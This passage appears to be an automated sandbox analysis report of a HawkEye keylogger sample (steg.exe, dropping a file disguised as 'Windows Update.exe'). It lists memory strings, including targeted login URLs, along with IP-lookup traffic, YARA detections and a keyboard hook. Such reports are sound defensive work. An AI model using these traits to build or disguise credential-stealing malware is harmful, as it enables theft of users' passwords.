                                Source: Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                                Source: Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
                                Source: Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360008316.000000000382A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
                                Source: Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                                Source: Windows Update.exe.0.drString found in binary or memory: http://securityxploded.com/browser-password-dump.php
                                Source: Windows Update.exe.0.drString found in binary or memory: http://securityxploded.com/email-password-dump.php
                                Source: Windows Update.exeString found in binary or memory: http://slashdot.org/bookmark.pl
                                Source: Windows Update.exeString found in binary or memory: http://twitter.com/
                                Source: Windows Update.exe, 00000004.00000002.301961765.000000000276D000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359319845.00000000033DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com
                                Source: Windows Update.exe, Windows Update.exe, 0000000E.00000002.359319845.00000000033DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com/
                                Source: steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drString found in binary or memory: http://whatismyipaddress.com/-
                                Source: Windows Update.exe, 0000000E.00000002.359863532.00000000037CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.comx&#q
                                Source: Windows Update.exe, 00000004.00000002.301961765.000000000276D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.comx&#qH
                                Source: Windows Update.exe.0.drString found in binary or memory: http://www.SecurityXploded.com
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                Source: steg.exe, 00000000.00000002.282794330.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
                                Source: steg.exe, 00000000.00000002.282794330.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comceta
                                Source: steg.exe, 00000000.00000002.282794330.0000000001727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                Source: steg.exe, 00000000.00000003.243241778.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                Source: Windows Update.exeString found in binary or memory: http://www.linkedin.com/
                                Source: Windows Update.exeString found in binary or memory: http://www.myspace.com
                                Source: Windows Update.exeString found in binary or memory: http://www.reddit.com/login
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                Source: steg.exe, 00000000.00000003.238498642.0000000005B9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.coman
                                Source: steg.exe, 00000000.00000003.238498642.0000000005B9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.come
                                Source: steg.exe, 00000000.00000003.238498642.0000000005B9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comr
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                Source: Windows Update.exeString found in binary or memory: http://www.stumbleupon.com/sign_up.php
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                Source: steg.exe, 00000000.00000003.243445751.0000000005B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com-
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                Source: steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drString found in binary or memory: https://000001BB00000050.oeaccount
                                Source: Windows Update.exeString found in binary or memory: https://accounts.google.com/servicelogin
                                Source: Windows Update.exeString found in binary or memory: https://login.yahoo.com/config/login
                                Source: Windows Update.exeString found in binary or memory: https://my.screenname.aol.com/_cqr/login/login.psp
                                Source: Windows Update.exeString found in binary or memory: https://myspace.com
                                Source: Windows Update.exeString found in binary or memory: https://pinterest.com/login/
                                Source: Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
                                Source: Windows Update.exeString found in binary or memory: https://signin.ebay.com/ws/ebayisapi.dll
                                Source: Windows Update.exe, 0000000E.00000002.360008316.000000000382A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/mail/?p=BadCredentials
                                Source: Windows Update.exe, 0000000E.00000002.360008316.000000000382A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/mail/?p=WantAuthError
                                Source: Windows Update.exeString found in binary or memory: https://twitter.com/
                                Source: Windows Update.exe, 00000004.00000002.302601416.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359863532.00000000037CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddress.com
                                Source: Windows Update.exe, 0000000E.00000002.359863532.00000000037CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddress.com/
                                Source: Windows Update.exe, 00000004.00000002.302601416.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359863532.00000000037CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddress.comx&#q
                                Source: Windows Update.exeString found in binary or memory: https://www.amazon.com/ap/signin/190-9059340-4656153
                                Source: Windows Update.exeString found in binary or memory: https://www.amazon.com/gp/css/homepage.html
                                Source: Windows Update.exe, 00000004.00000002.302601416.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359863532.00000000037CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                                Source: Windows Update.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                                Source: Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drString found in binary or memory: https://www.noip.com/
                                Source: unknownDNS traffic detected: queries for: 140.244.14.0.in-addr.arpa
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 14_2_012BA09A recv,14_2_012BA09A
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 22 Mar 2022 02:35:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Chl-Bypass: 1Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTX-Frame-Options: SAMEORIGINExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Set-Cookie: __cf_bm=3T2zMhWJGUJiFvFygp4Ze35_fGFAV8AUcX3bmxdV52o-1647916550-0-AY8ARkBKAY0npUTkZLgdxWJqOZhqmSjbY7aXc+zs0c6A/7TMhypnyvrbA2CHANpeBLYSTVgqKfJygLjIYrQUBFI=; path=/; expires=Tue, 22-Mar-22 03:05:50 GMT; domain=.whatismyipaddress.com; HttpOnly; SecureServer: cloudflareCF-RAY: 6efb89487ef75c7a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 22 Mar 2022 02:36:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Chl-Bypass: 1Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTX-Frame-Options: SAMEORIGINExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Set-Cookie: __cf_bm=hUhD2UdX9KkVERfiV5SDQBrwmWvqrKnJHnrZS9gL4WQ-1647916576-0-Af8AuUM/CWRh6nfYYBFJyHJJ4OBNTTTEmP62nrYSdhQuKojNAEw1zeh8LNsfpa7olf2S2L1utyAPIOltIVpa2lM=; path=/; expires=Tue, 22-Mar-22 03:06:16 GMT; domain=.whatismyipaddress.com; HttpOnly; SecureServer: cloudflareCF-RAY: 6efb89ea99529064-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Source: Windows Update.exe.0.drString found in binary or memory: SetEnvironmentVariableAOLEAUT32.dllhttp://www.facebook.com/https://www.facebook.com/http://twitter.com/https://twitter.com/https://login.yahoo.com/config/loginhttps://pinterest.com/login/http://www.linkedin.com/https://my.screenname.aol.com/_cqr/login/login.psphttps://www.amazon.com/ap/signin/190-9059340-4656153https://signin.ebay.com/ws/ebayisapi.dllhttps://accounts.google.com/serviceloginhttps://www.google.com/accounts/serviceloginhttp://digg.comhttp://www.myspace.comhttps://myspace.comhttps://www.amazon.com/gp/css/homepage.htmlhttp://www.stumbleupon.com/sign_up.phphttp://slashdot.org/bookmark.plhttp://www.reddit.com/loginB equals www.facebook.com (Facebook)
                                Source: steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drString found in binary or memory: SetEnvironmentVariableAOLEAUT32.dllhttp://www.facebook.com/https://www.facebook.com/http://twitter.com/https://twitter.com/https://login.yahoo.com/config/loginhttps://pinterest.com/login/http://www.linkedin.com/https://my.screenname.aol.com/_cqr/login/login.psphttps://www.amazon.com/ap/signin/190-9059340-4656153https://signin.ebay.com/ws/ebayisapi.dllhttps://accounts.google.com/serviceloginhttps://www.google.com/accounts/serviceloginhttp://digg.comhttp://www.myspace.comhttps://myspace.comhttps://www.amazon.com/gp/css/homepage.htmlhttp://www.stumbleupon.com/sign_up.phphttp://slashdot.org/bookmark.plhttp://www.reddit.com/loginB equals www.linkedin.com (Linkedin)
                                Source: Windows Update.exe.0.drString found in binary or memory: SetEnvironmentVariableAOLEAUT32.dllhttp://www.facebook.com/https://www.facebook.com/http://twitter.com/https://twitter.com/https://login.yahoo.com/config/loginhttps://pinterest.com/login/http://www.linkedin.com/https://my.screenname.aol.com/_cqr/login/login.psphttps://www.amazon.com/ap/signin/190-9059340-4656153https://signin.ebay.com/ws/ebayisapi.dllhttps://accounts.google.com/serviceloginhttps://www.google.com/accounts/serviceloginhttp://digg.comhttp://www.myspace.comhttps://myspace.comhttps://www.amazon.com/gp/css/homepage.htmlhttp://www.stumbleupon.com/sign_up.phphttp://slashdot.org/bookmark.plhttp://www.reddit.com/loginB equals www.myspace.com (Myspace)
                                Source: Windows Update.exe.0.drString found in binary or memory: SetEnvironmentVariableAOLEAUT32.dllhttp://www.facebook.com/https://www.facebook.com/http://twitter.com/https://twitter.com/https://login.yahoo.com/config/loginhttps://pinterest.com/login/http://www.linkedin.com/https://my.screenname.aol.com/_cqr/login/login.psphttps://www.amazon.com/ap/signin/190-9059340-4656153https://signin.ebay.com/ws/ebayisapi.dllhttps://accounts.google.com/serviceloginhttps://www.google.com/accounts/serviceloginhttp://digg.comhttp://www.myspace.comhttps://myspace.comhttps://www.amazon.com/gp/css/homepage.htmlhttp://www.stumbleupon.com/sign_up.phphttp://slashdot.org/bookmark.plhttp://www.reddit.com/loginB equals www.twitter.com (Twitter)
                                Source: steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drString found in binary or memory: SetEnvironmentVariableAOLEAUT32.dllhttp://www.facebook.com/https://www.facebook.com/http://twitter.com/https://twitter.com/https://login.yahoo.com/config/loginhttps://pinterest.com/login/http://www.linkedin.com/https://my.screenname.aol.com/_cqr/login/login.psphttps://www.amazon.com/ap/signin/190-9059340-4656153https://signin.ebay.com/ws/ebayisapi.dllhttps://accounts.google.com/serviceloginhttps://www.google.com/accounts/serviceloginhttp://digg.comhttp://www.myspace.comhttps://myspace.comhttps://www.amazon.com/gp/css/homepage.htmlhttp://www.stumbleupon.com/sign_up.phphttp://slashdot.org/bookmark.plhttp://www.reddit.com/loginB equals www.yahoo.com (Yahoo)
                                Source: Windows Update.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                                Source: Windows Update.exeString found in binary or memory: http://www.linkedin.com/ equals www.linkedin.com (Linkedin)
                                Source: Windows Update.exeString found in binary or memory: http://www.myspace.com equals www.myspace.com (Myspace)
                                Source: Windows Update.exeString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)

                                Key, Mouse, Clipboard, Microphone and Screen Capturing

                                barindex
                                Yara detected HawkEye Keylogger
                                Source: Yara matchFile source: steg.exe, type: SAMPLE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.acb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.1b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.ac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.1b377.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f8b377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.34d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.b4d97c.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.WindowsUpdate.exe.2cb377.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.WindowsUpdate.exe.34d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.100d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.Windows Update.exe.b4d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.9d97c.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.steg.exe.100d97c.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.ac0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.Windows Update.exe.acb377.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.steg.exe.f80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.Windows Update.exe.10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000E.00000002.359909884.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.329408523.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.356895445.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000003.324470514.0000000000915000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.278862064.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.276722207.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.302645603.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.280199834.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.331051101.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000000.234986567.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.319176501.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.330464397.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: steg.exe PID: 6544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 7000, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5876, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                                Installs a global keyboard hook
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exeJump to behavior
                                Contains functionality to log keystrokes (.Net Source)
                                Source: steg.exe, Form1.cs.Net Code: HookKeyboard
                                Source: Windows Update.exe.0.dr, Form1.cs.Net Code: HookKeyboard
                                Source: 0.0.steg.exe.f80000.0.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 0.2.steg.exe.f80000.0.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: WindowsUpdate.exe.4.dr, Form1.cs.Net Code: HookKeyboard
                                Source: 4.0.Windows Update.exe.10000.9.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 4.0.Windows Update.exe.10000.6.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 4.0.Windows Update.exe.10000.0.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 4.0.Windows Update.exe.10000.3.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 4.2.Windows Update.exe.10000.0.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 12.0.WindowsUpdate.exe.2c0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 12.2.WindowsUpdate.exe.2c0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 14.2.Windows Update.exe.ac0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 14.0.Windows Update.exe.ac0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 14.0.Windows Update.exe.ac0000.9.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 14.0.Windows Update.exe.ac0000.3.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: 14.0.Windows Update.exe.ac0000.6.unpack, Form1.cs.Net Code: HookKeyboard
                                Source: steg.exe, 00000000.00000002.282881047.000000000177A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2708
                                Source: C:\Users\user\Desktop\steg.exeCode function: 0_2_00FDE0770_2_00FDE077
